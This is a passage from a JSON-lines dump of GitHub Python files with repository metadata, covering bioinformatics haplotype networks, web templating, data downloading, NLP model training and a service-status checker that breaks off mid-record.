os.path.join(in_dir, infile)\n freq_file = re.sub(r'pi_pos_(.*?).fasta', r'freq_\\1.txt', pi_pos_file)\n if infile.find(\"all\") != -1:\n haplotype_network(pi_pos_file, freq_file, True)\n else:\n haplotype_network(pi_pos_file, freq_file, False)\n\n\ndef haplotype_network(pi_pos_file: str, freq_file: str, draw_net: bool):\n # print(\"生成pattern列表\")\n print(\"Generate a list of patterns\")\n seqs = {}\n seq_count = 0\n seqrecords = SeqIO.parse(pi_pos_file, \"fasta\")\n print(pi_pos_file)\n for seqrecord in seqrecords:\n seq_count += 1\n # seqs.add(str(seqrecord.seq).upper())\n seq = str(seqrecord.seq).upper()\n if seq in seqs:\n seqs[seq].append(str(seq_count))\n else:\n seqs[seq] = [str(seq_count)]\n\n init_freq(freq_file)\n\n # print(\"生成nodes文件\")\n print(\"Generate nodes file\")\n seqss = list(seqs)\n seqindex = []\n for i in range(len(seqss[0])):\n seqindex.append([i, pos_ref[i], pos_freq[i]])\n seqindex.sort(key=lambda x: (-x[2], x[1]))\n nodes_file = open(re.sub(r'pi_pos_(.*?).fasta', r'nodes_\\1.txt', pi_pos_file), \"w\")\n genos = {}\n for seq in seqss:\n genos[seq] = seq2geno(seq, seqindex)\n nodes_file.write(genos[seq] + \"\\t\" + \"\\t\".join(seqs[seq]) + \"\\n\")\n nodes_file.flush()\n nodes_file.close()\n\n if draw_net:\n # print(\"计算海明距离矩阵\")\n print(\"Calculate the Hamming distance matrix\")\n print('len seqss is {} x {}'.format(len(seqss), len(seqss[0])))\n # df_distance = pd.DataFrame(np.zeros([len(seqss), len(seqss)], dtype=int), index=seqss, columns=seqss)\n # df_max_maf = pd.DataFrame(np.zeros([len(seqss), len(seqss)], dtype=float), index=seqss, columns=seqss)\n # df_diff = pd.DataFrame(np.empty([len(seqss), len(seqss)], dtype=str), index=seqss, columns=seqss)\n # for i in tqdm(range(len(seqss)), desc=\"line\"):\n # for j in range(len(seqss)):\n # if i > j:\n # df_distance.iloc[i, j], df_max_maf.iloc[i, j], df_diff.iloc[i, j] = hamming(seqss[i], seqss[j])\n tempfile = os.path.join(os.path.dirname(pi_pos_file), \"candidate_links.txt\")\n if os.path.exists(tempfile):\n os.remove(tempfile)\n t_beg = time.time()\n parham_mode = os.environ.get('PARHAM_MODE', 'FULL')\n if parham_mode != 'OFF':\n out_file = tempfile\n net_file = re.sub(r'pi_pos_(.*?).fasta', r'net_\\1.txt', pi_pos_file)\n if parham_mode == 'N2_LOOP_ONLY':\n net_file = None\n elif parham_mode != 'FULL_WITH_CAND':\n out_file = None\n parham.compute_hamming_matrix(seqss, pos_freq, pos_ref,\n out_file, net_file)\n if parham_mode.startswith('FULL'):\n return\n else:\n print('Not using parham. You might be super slow!')\n # Original implementation\n p = multiprocessing.Pool(8, initializer=tqdm.set_lock,\n initargs=(multiprocessing.RLock(),))\n # p = multiprocessing.Pool(multiprocessing.cpu_count())\n for i in range(len(seqss)):\n p.apply(exec_queue, args=(i, seqss, pos_freq, tempfile))\n p.close()\n p.join()\n t_end = time.time()\n print('Elapsed time {} s'.format(t_end - t_beg))\n\n # print(\"生成候选link列表\")\n print(\"Generate a list of candidate links\")\n node_list = []\n # for i in tqdm(range(len(df_distance.index)), desc=\"line\"):\n # for j in range(len(df_distance.columns)):\n # if i > j:\n # # if df_distance.iloc[i, j] > 0:\n # node_list.append([i + 1, j + 1, df_distance.iloc[i, j], df_max_maf.iloc[i, j], df_diff.iloc[i, j]])\n with open(tempfile, \"r\") as candi_file:\n for line in tqdm(candi_file, desc=\"link\"):\n line = line.rstrip()\n splitline = line.split(\"\\t\")\n node_list.append([int(splitline[0]) + 1, int(splitline[1]) + 1, int(splitline[2]), float(splitline[3]),\n splitline[4]])\n\n # print(\"候选link排序\")\n print(\"Candidate link ranking\")\n node_list.sort(key=lambda x: (x[2], x[3]))\n\n # print(\"生成网络\")\n print(\"Generate network\")\n net_list = []\n max_length = len(seqss)\n added_nodes = set()\n clades = {}\n current_clade = 0\n\n for node in tqdm(node_list, desc=\"link\"):\n if len(added_nodes) != max_length:\n if node[0] not in added_nodes:\n if node[1] not in added_nodes:\n clades[current_clade] = set([node[0], node[1]])\n current_clade += 1\n else:\n clades[find_clade(clades, node[1])].add(node[0])\n net_list.append(node)\n else:\n if node[1] not in added_nodes:\n clades[find_clade(clades, node[0])].add(node[1])\n net_list.append(node)\n else:\n clade0 = find_clade(clades, node[0])\n clade1 = find_clade(clades, node[1])\n if clade0 != clade1:\n clades[clade0] = clades[clade0].union(clades[clade1])\n clades.pop(clade1)\n net_list.append(node)\n added_nodes.add(node[0])\n added_nodes.add(node[1])\n else:\n clade0 = find_clade(clades, node[0])\n clade1 = find_clade(clades, node[1])\n if clade0 != clade1:\n clades[clade0] = clades[clade0].union(clades[clade1])\n clades.pop(clade1)\n net_list.append(node)\n if len(clades) < 2:\n break\n\n net_file = open(re.sub(r'pi_pos_(.*?).fasta', r'net_\\1.txt', pi_pos_file), \"w\")\n for link in net_list:\n # net_file.write(\"%d\\t%d\\t%d\\t%s\\n\" % (link[0], link[1], link[2], link[4]))\n diff = []\n for i in link[4].split(\",\"):\n i = int(i)\n diff.append([pos_ref[i], seqss[link[0] - 1][i], seqss[link[1] - 1][i]])\n diff.sort(key=lambda x: x[0])\n diff = [\"%d:%s:%s\" % (item[0], item[1], item[2]) for item in diff]\n diff = \"|\".join(diff)\n net_file.write(\"%d\\t%d\\t%d\\t%s\\n\" % (link[0], link[1], link[2], diff))\n net_file.flush()\n net_file.close()\n\n\nif __name__ == '__main__':\n batch_haplotype_network()\n", "repo_name": "BioMedBigDataCenter/VENAS", "sub_path": "haplotype_network.py", "file_name": "haplotype_network.py", "file_ext": "py", "file_size_in_byte": 10403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "multiprocessing.current_process", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 118, "usage_type": "call"}, {"api_name": "click.command", "line_number": 98, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 99, "usage_type": "call"}, {"api_name": "click.Path", "line_number": 99, "usage_type": "call"}, {"api_name": "Bio.SeqIO.parse", "line_number": 130, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 130, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 173, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 173, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 176, "usage_type": "call"}, {"api_name": "parham.compute_hamming_matrix", "line_number": 181, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 188, "usage_type": "call"}, {"api_name": "tqdm.tqdm.set_lock", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 188, "usage_type": "name"}, {"api_name": "multiprocessing.RLock", "line_number": 189, "usage_type": "call"}, {"api_name": "time.time", "line_number": 195, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 207, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 225, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 257, "usage_type": "call"}]} +{"seq_id": "72999872806", "text": "from rest_framework import serializers\nfrom .models import Note\n\n\nclass NoteSerializer(serializers.HyperlinkedModelSerializer):\n user = serializers.HiddenField(default=serializers.CurrentUserDefault())\n url = serializers.HyperlinkedIdentityField(view_name=\"notes:note-detail\")\n\n class Meta:\n model = Note\n fields = ['title', 'text', 'created', 'url', 'user']\n", "repo_name": "YaroslavChyhryn/PythonPLINK", "sub_path": "notes/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 382, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HiddenField", "line_number": 6, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CurrentUserDefault", "line_number": 6, "usage_type": "call"}, {"api_name": "rest_framework.serializers.HyperlinkedIdentityField", "line_number": 7, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Note", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "73101525284", "text": "\"\"\"Feito para salvar as despesas por ano a partir do ano de 2008 em um csv\"\"\"\nimport urllib.request\nfrom datetime import datetime\n\nstart_year = 2008\ncurrent_date = datetime.today()\n\nraw_url = 'http://riotransparente.rio.rj.gov.br/arquivos/Open_Data_Desp_{year}.asp'\nraw_filename = '{extract_date}_{reference_year}.csv'\n\nfor year in range(start_year, current_date.year + 1): # include current year in loop\n url = raw_url.format(year=year)\n filename = raw_filename.format(extract_date=current_date.strftime('%Y%m%d'), reference_year=year)\n urllib.request.urlretrieve(url, filename)", "repo_name": "jamesperes-zz/rio-transparente", "sub_path": "salva.py", "file_name": "salva.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.today", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 14, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "11831756554", "text": "from torch_geometric.data import download_url, extract_zip\n\nurl = 'https://files.grouplens.org/datasets/movielens/ml-latest-small.zip'\nextract_zip(download_url(url, '.'), '.')\n\nmovie_path = './ml-latest-small/movies.csv'\nrating_path = './ml-latest-small/ratings.csv'\n\n\nimport pandas as pd\n\nprint(pd.read_csv(movie_path).head())\nprint(pd.read_csv(rating_path).head())", "repo_name": "nayong-kim/dev_gnn", "sub_path": "geometric_dataset.py", "file_name": "geometric_dataset.py", "file_ext": "py", "file_size_in_byte": 366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch_geometric.data.extract_zip", "line_number": 4, "usage_type": "call"}, {"api_name": "torch_geometric.data.download_url", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "18799445492", "text": "from jinja2 import Template\n\ncars = [\n {'model': 'Audi', 'price': 23000},\n {'model': 'Skoda', 'price': 17300},\n {'model': 'Volvo', 'price': 44300},\n {'model': 'Volkswagen', 'price': 21300},\n]\n\ntpl = \"Суммарная цена автомобилей {{ cs | sum(attribute='price') }}\"\ntm = Template(tpl)\nmsg = tm.render(cs=cars)\nprint(msg)\n\ndigits = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\ntpl = \"Суммарная цена автомобилей {{ cs | sum }}\"\ntm = Template(tpl)\nmsg = tm.render(cs=digits)\nprint(msg)\n\ntpl = \"Максимальная цена автомобиля {{cs | max(attribute='price')}}\"\ntm = Template(tpl)\nmsg = tm.render(cs=cars)\nprint(msg)\n\npersons = [\n {'name': 'Name1', 'old': 18, 'weight': 78.5},\n {'name': 'Name2', 'old': 28, 'weight': 82.3},\n {'name': 'Name3', 'old': 38, 'weight': 64.1},\n {'name': 'Name4', 'old': 48, 'weight': 77.6},\n]\n\ntpl = '''\n{%- for u in users -%}\n{% filter upper %} {{u.name}} {% endfilter %}\n{% endfor -%}\n'''\n\ntm = Template(tpl)\nmsg = tm.render(users=persons)\nprint(msg)\n\nhtml = '''\n{%- macro input(name, value='', type='text', size=20) -%}\n \n{%- endmacro %}\n\n

    {{ input('username')}}\n

    {{ input('email')}}\n

    {{ input('password')}}\n'''\n\ntm = Template(html)\nmsg = tm.render()\nprint(msg)\n\n\nhtml = '''\n{% macro list_users(list_of_users) -%}\n

      \n {% for u in list_of_users -%}\n
    • {{u.name}} {{caller(u)}}\n {%- endfor %}\n
    \n{%- endmacro %}\n\n{% call(user) list_users(users) %}\n
      \n
    • age: {{user.old}}\n
    • weight: {{user.weight}}\n
    \n{% endcall -%}\n'''\n\ntm = Template(html)\nmsg = tm.render(users=persons)\nprint(msg)\n", "repo_name": "MuzaffarSoliyev/jinja2-tutorials", "sub_path": "ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 1731, "program_lang": "python", "lang": "te", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "jinja2.Template", "line_number": 11, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 18, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 23, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 40, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 54, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "44293358276", "text": "# To run the thing do:\n# \n# 1) Make sure you have flask and everything else installed (pip install blah)\n# 2) replace with your model path and run: \n#\n# FLASK_APP=techdemo.py FLASK_DEBUG=1 MODEL_PATH=\"/Users/eugene/Git/fastText/models/wiki.da.bin\" python -m flask run\n# \n\nimport fasttext\nimport json\nimport pandas\nimport numpy as np\nimport scipy\nimport string # for punctuation\nimport os # to access environment variables\n\nfrom scipy import spatial\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.spatial.distance import cosine as cosine_distance\nfrom collections import OrderedDict\nimport matplotlib.pyplot as plt\n\nfrom flask import Flask, request, send_from_directory, render_template\n\nif not 'model' in vars():\n\tpath = os.environ['MODEL_PATH']\n\tmodel = fasttext.load_model(path)\n\ndef read_ffms():\n\twith open('../FFM.json') as data_file: \n\t\tdata = json.load(data_file)[\"Historie\"][\"3. - 4. klasse\"]\n\t\tfaerdiheder = data[\"færdighed\"]\n\t\tviden = data[\"viden\"]\n\n\t\treturn {\"faerdiheder\": faerdiheder, \"viden\": viden}\n\n#####################################\n# dirty web development stuff below #\n#####################################\napp = Flask(__name__, static_url_path='')\n\n@app.route('/suggest', methods=[\"POST\"])\ndef suggest(text = None):\n\tffms = read_ffms()\n\tt = request.form['text']\n\tif not t:\n\t\treturn render_template('cards.html', text=None)\n\n\ttext_score = model[t]\n\tdistances = {}\n\tfor (i, text) in enumerate(ffms[\"faerdiheder\"]):\n\t\tffm_score = model[text]\n\t\tdistance = cosine_distance(text_score, ffm_score)\n\t\tdistances[float(distance)] = i\n\t\n\tdistances = OrderedDict(sorted(distances.items(), key=lambda item: item[0]))\n\trendered = []\n\tfor i in distances:\n\t\tindex = distances[i]\n\t\tdata = { \n\t\t\t\"first\": (i == list(distances.keys())[0]),\n\t\t\t\"score\": \"{0:.1f}%\".format((1-i)*100), \n\t\t\t\"faerdighed\": ffms[\"faerdiheder\"][index], \n\t\t\t\"viden\": ffms[\"viden\"][index] \n\t\t}\n\t\trendered.append(render_template('card.html', data=data))\n\n\treturn render_template('cards.html', text=(' '.join(rendered[0:5])))\n\n@app.route('/static/')\ndef send_static(path):\n return send_from_directory('static', path)\n\n@app.route('/')\n@app.route('/')\ndef main(portal_name = None):\n\treturn render_template('main.html', portal_name=portal_name)\n", "repo_name": "eugene/gyldendal", "sub_path": "techdemo/techdemo.py", "file_name": "techdemo.py", "file_ext": "py", "file_size_in_byte": 2269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "fasttext.load_model", "line_number": 27, "usage_type": "call"}, {"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 53, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "73971493924", "text": "# Importing Libraries\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# Website URL\nurl = 'https://www.iplt20.com/auction'\nr = requests.get(url)\n\n\n# Extracting HTML\nsoup = BeautifulSoup(r.content, 'html.parser')\n\n\n# Classes\nsection_class = 'ih-points-table-sec position-relative'\nteam_name_class = 'ih-t-left align-center'\ntable_class = 'ih-td-tab auction-tbl'\n\n\n# Finding sections wih table\nmain_section = soup.find_all('section', class_ = section_class)\n# DataFrame Header\nheader = ['TEAM']\ncreate_df = True\n\n\nfor section in main_section:\n # getting table name\n team_name = (section.find('h2')).text\n # Getting Table\n table = section.find('table', class_ = table_class)\n # Creating DataFrame and setting headers\n if create_df == True:\n headings = table.find_all('th')\n for head in headings:\n header.append(head.text)\n df = pd.DataFrame(columns = header)\n create_df = False\n # Getting data from table\n rows = table.find_all('tr')\n for row in rows[1:]:\n # Creating a row of data ['Team Name', 'Player Name', 'Nationality', 'Type', 'Price']\n row_data = [team_name]\n data = row.find_all('td')\n for td in data:\n row_data.append(td.text)\n # Adding row to DataFrame\n df.loc[len(df)] = row_data\n \n# Saving to csv\ndf.to_csv('ipl_data.csv', index = False)", "repo_name": "nik-hil-24/IPL-Auction", "sub_path": "scraping.py", "file_name": "scraping.py", "file_ext": "py", "file_size_in_byte": 1397, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "34231093259", "text": "import spotdl\nimport clipboard\nimport enchant\nfrom shutil import copyfile\nfrom os import listdir, remove, mkdir\nfrom os.path import isfile, join\nfrom pathlib import Path, PurePath\nimport ctypes\n\npath = Path(Path.home(), \"Desktop/Music\")\n\n\ndef download(url: str):\n try:\n ans = ctypes.windll.user32.MessageBoxW(0, f\"Start downloading this URL?\\n\\n{url}\", \"Success\", 1)\n if ans == 1:\n dict = enchant.Dict(\"en_US\")\n words = url.split(' ', 1)\n if not dict.check(words[0]) and not (url.startswith(\"https://open.spotify.com\") or url.startswith(\"https://youtu.be\")):\n raise Exception(\"Bad URL!\")\n downloader = spotdl.Spotdl()\n downloader.download_track(url)\n default_files = [\"main.py\", \"setup.cmd\", \"song-download.cmd\", \".gitignore\"]\n song_files = [f for f in listdir(\"./\") if isfile(join(\"./\", f)) and f not in default_files]\n if not path.exists():\n path.mkdir()\n copyfile(f\"./{song_files[0]}\", Path(path, song_files[0]))\n remove(song_files[0])\n ctypes.windll.user32.MessageBoxW(0, f\"Done downloading {song_files[0]}\", \"Success\", 0)\n except Exception as e:\n ctypes.windll.user32.MessageBoxW(0, str(e), \"Fail\", 0)\n\n\nif __name__ == '__main__':\n download(clipboard.paste())\n", "repo_name": "SharonFabin/spotify-downloader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 10, "usage_type": "call"}, {"api_name": "ctypes.windll.user32.MessageBoxW", "line_number": 15, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 15, "usage_type": "attribute"}, {"api_name": "enchant.Dict", "line_number": 17, "usage_type": "call"}, {"api_name": "spotdl.Spotdl", "line_number": 21, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 27, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 28, "usage_type": "call"}, {"api_name": "ctypes.windll.user32.MessageBoxW", "line_number": 29, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 29, "usage_type": "attribute"}, {"api_name": "ctypes.windll.user32.MessageBoxW", "line_number": 31, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 31, "usage_type": "attribute"}, {"api_name": "clipboard.paste", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "38102073109", "text": "import sys\nsys.path.append('./src')\nsys.path.append('./src/models')\nimport torch.nn as nn\nimport numpy as np\nimport dataman.wrangle as wrangle\nfrom models.seq2seq_model_pytorch import Seq2Seq\nimport models.model_pipeline_pytorch as model_pipeline_pytorch\nimport models.siamese_pytorch as siamese_pytorch\nfrom utils import dotdict\nimport torch\nimport torch.optim as optim\nimport sys\nimport logging\n\nimport models.load_embeddings as load_embeddings\nimport constants\n\nlogger = logging.getLogger(__name__)\n\nargs = dotdict({\n 'type': 'siamese',\n 'encoder_type': 'rnn',\n 'lr': 0.05,\n 'use_dot_attention': True,\n 'learning_rate_decay': 0.98,\n 'max_length': 70,\n 'epochs': 10,\n 'batch_size': 64,\n 'batches_per_epoch': 3000,\n 'test_batches_per_epoch': 500,\n 'input_size': 300,\n 'hidden_size': 2048,\n 'layer1_hidden_size': 1024,\n 'n_layers': 1,\n 'bidirectional': True,\n 'embedding_size': 300,\n 'fix_emb': True,\n 'dp_ratio': 0.3,\n 'd_out': 3, # 3 classes\n 'mlp_classif_hidden_size_list': [512, 512],\n 'cuda': torch.cuda.is_available(),\n})\nstate = {k: v for k, v in args.items()}\n\n\nif __name__ == \"__main__\":\n print(args)\n\n dm = wrangle.DataManager(args)\n args.n_embed = dm.vocab.n_words\n if args.type == 'siamese':\n model = siamese_pytorch.SiameseClassifier(config=args)\n elif args.type == 's2s':\n model = Seq2Seq(config=args)\n else:\n raise Exception('model type not supported')\n\n model.embed.weight.data = load_embeddings.load_embeddings(\n dm.vocab, constants.EMBED_DATA_PATH, args.embedding_size)\n\n # Numbers of parameters\n print(\"number of trainable parameters found {}\".format(sum(\n param.nelement() for param in model.parameters()\n if param.requires_grad)))\n\n best_dev_acc = 0\n best_train_acc = -np.infty\n\n # load trained model from checkpoint\n if len(sys.argv) > 1:\n checkpoint_dir = sys.argv[1]\n print('loading from checkpoint in {}'.format(checkpoint_dir))\n model_pipeline_pytorch.load_checkpoint(model, checkpoint=checkpoint_dir)\n state['lr'] = 0.01\n print('resetting lr as {}'.format(state['lr']))\n\n criterion = nn.NLLLoss()\n\n for epoch in range(args.epochs):\n dm.shuffle_train_data()\n\n print('lr {}'.format(state['lr']))\n optimizer = optim.SGD(\n [param for param in model.parameters() if param.requires_grad],\n lr=state['lr'])\n logger.info('\\nEpoch: [{} | {}] LR: {}'.format(\n epoch + 1, args.epochs, state['lr']))\n\n if args.cuda:\n model.cuda()\n train_loss, train_acc = model_pipeline_pytorch.train(\n model=model,\n optimizer=optimizer,\n epoch=epoch,\n di=dm,\n args=args,\n loss_criterion=criterion,\n )\n dev_loss, dev_acc = model_pipeline_pytorch.test(\n model=model,\n epoch=epoch,\n di=dm,\n args=args,\n loss_criterion=criterion,\n )\n if dev_acc > best_dev_acc:\n print('New best model: {} vs {}'.format(dev_acc, best_dev_acc))\n best_dev_acc = dev_acc\n model_pipeline_pytorch.save_checkpoint(\n state={\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'acc': dev_acc,\n 'best_acc': best_dev_acc,\n 'optimizer': optimizer.state_dict()\n }, is_best=True)\n print('Saving to checkpoint')\n model_pipeline_pytorch.save_checkpoint(\n state={\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'acc': dev_acc,\n 'best_acc': best_dev_acc,\n 'optimizer': optimizer.state_dict()\n }, is_best=False)\n if train_acc - best_train_acc < 3:\n state['lr'] *= args.learning_rate_decay\n if train_acc > best_train_acc:\n best_train_acc = train_acc\n", "repo_name": "kolchinski/NLI_2018", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.dotdict", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 42, "usage_type": "attribute"}, {"api_name": "dataman.wrangle.DataManager", "line_number": 50, "usage_type": "call"}, {"api_name": "dataman.wrangle", "line_number": 50, "usage_type": "name"}, {"api_name": "models.siamese_pytorch.SiameseClassifier", "line_number": 53, "usage_type": "call"}, {"api_name": "models.siamese_pytorch", "line_number": 53, "usage_type": "name"}, {"api_name": "models.seq2seq_model_pytorch.Seq2Seq", "line_number": 55, "usage_type": "call"}, {"api_name": "models.load_embeddings.load_embeddings", "line_number": 59, "usage_type": "call"}, {"api_name": "models.load_embeddings", "line_number": 59, "usage_type": "name"}, {"api_name": "constants.EMBED_DATA_PATH", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.infty", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}, {"api_name": "models.model_pipeline_pytorch.load_checkpoint", "line_number": 74, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 84, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.train", "line_number": 92, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 92, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.test", "line_number": 100, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 100, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.save_checkpoint", "line_number": 110, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 110, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.save_checkpoint", "line_number": 119, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "148222980", "text": "import datetime\nimport json\nimport subprocess\nfrom multiprocessing.pool import ThreadPool\n\nimport redis\nimport requests\n\nfrom crawler import bus_crawler, webap_crawler\nfrom utils import config, error_code\nfrom utils.config import REDIS_URL\n\nred_string = redis.StrictRedis.from_url(\n url=REDIS_URL, db=4, charset=\"utf-8\", decode_responses=True)\n\nWRONG_ACCOUNT = 'abcdefg'\nWRONG_PASSWORD = 'wowisatest'\n\nLEAVE_URL = 'http://leave.nkust.edu.tw/LogOn.aspx'\nLIBRARY_URL = 'http://www.lib.nkust.edu.tw/portal/portal_login.php'\n\n\ndef _request(session, url, timeout):\n try:\n if session.get(url=url, timeout=timeout).status_code == 200:\n return 100\n except requests.exceptions.ConnectTimeout as e:\n return 101\n return 101\n\n\ndef server_status():\n\n if red_string.exists('server_status'):\n return red_string.get('server_status')\n\n req_session = requests.session()\n pool = ThreadPool(processes=4)\n\n bus_test = pool.apply_async(bus_crawler.login, kwds={\n 'session': req_session,\n 'username': WRONG_ACCOUNT,\n 'password': WRONG_PASSWORD\n })\n webap_test = pool.apply_async(webap_crawler.login, kwds={\n 'session': req_session,\n 'username': config.AP_GUEST_ACCOUNT,\n 'password': config.AP_GUEST_PASSWORD\n })\n\n leave_test = pool.apply_async(_request, kwds={\n 'session': req_session,\n 'url': LEAVE_URL,\n 'timeout': 4\n })\n library_test = pool.apply_async(_request, kwds={\n 'session': req_session,\n 'url': LIBRARY_URL,\n 'timeout': 4\n })\n\n git_commit_id = subprocess.check_output(\n ['git', 'rev-parse', '--short', 'HEAD']).decode(\"utf-8\").strip(\"\\n\")\n\n data = {\n \"date\": datetime.datetime.utcnow().isoformat(timespec='seconds')+\"Z\",\n \"commit\": git_commit_id,\n \"data\": [\n {\n \"service\": \"ap\",\n \"isAlive\": webap_test.get() is 